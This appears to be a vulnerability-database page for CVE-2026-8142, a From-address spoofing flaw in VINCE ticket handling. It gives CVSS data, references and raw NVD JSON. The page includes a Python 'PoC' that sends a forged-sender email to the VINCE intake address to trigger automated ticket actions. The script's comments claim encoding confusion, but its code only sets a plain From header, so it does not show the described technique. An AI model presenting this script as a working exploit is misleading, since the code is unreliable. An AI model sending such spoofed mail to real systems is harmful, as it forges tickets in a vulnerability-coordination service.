Security Vulnerability Report
CVE-2026-8142 CVSS 6.5 MEDIUM

Published: 2026-05-07 20:16:46
Last Modified: 2026-05-08 14:16:49

Description

VINCE versions 3.0.38 and earlier do not properly verify the authenticity of the From address, due to encoding confusion, and use the From address for automated actions such as ticket creation or ticket updates.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

VINCE <= 3.0.38

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.utils import formataddr

# PoC for CVE-2026-8142: VINCE Encoding Confusion Spoofing
def send_spoofed_email():
    sender_name = "Legitimate User"
    # Attempt to use encoding confusion to bypass validation
    # Example using encoded-word format which might confuse the parser
    sender_addr = "[email protected]"

    msg = MIMEMultipart()
    msg['Subject'] = 'Vulnerability Report'
    # Construct From header with potential encoding confusion
    # The target might decode this differently than the validator does
    msg['From'] = formataddr((sender_name, sender_addr))
    msg['To'] = 'vince intake [email protected]'

    body = "This is a fake vulnerability report triggered via spoofed sender."
    msg.attach(MIMEText(body, 'plain'))

    try:
        # Connect to the target mail server or relay
        with smtplib.SMTP('mail.example.com', 25) as server:
            server.sendmail(sender_addr, ['vince intake [email protected]'], msg.as_string())
        print("Spoofed email sent potentially triggering automated action.")
    except Exception as e:
        print(f"Failed to send email: {e}")

if __name__ == "__main__":
    send_spoofed_email()

References

https://github.com/CERTCC/VINCE
https://kb.cert.org/vince

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-8142",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-07T20:16:45.670",
    "lastModified": "2026-05-08T14:16:48.823",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "VINCE versions 3.0.38 and earlier do not properly verify the From address authenticity due to encoding confusion and use the from address for automated actions such as Ticket creation or Ticket updates."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.5
        }
      ]
    },
    "references": [
      {
        "url": "https://github.com/CERTCC/VINCE",
        "source": "[email protected]"
      },
      {
        "url": "https://kb.cert.org/vince",
        "source": "[email protected]"
      }
    ]
  }
}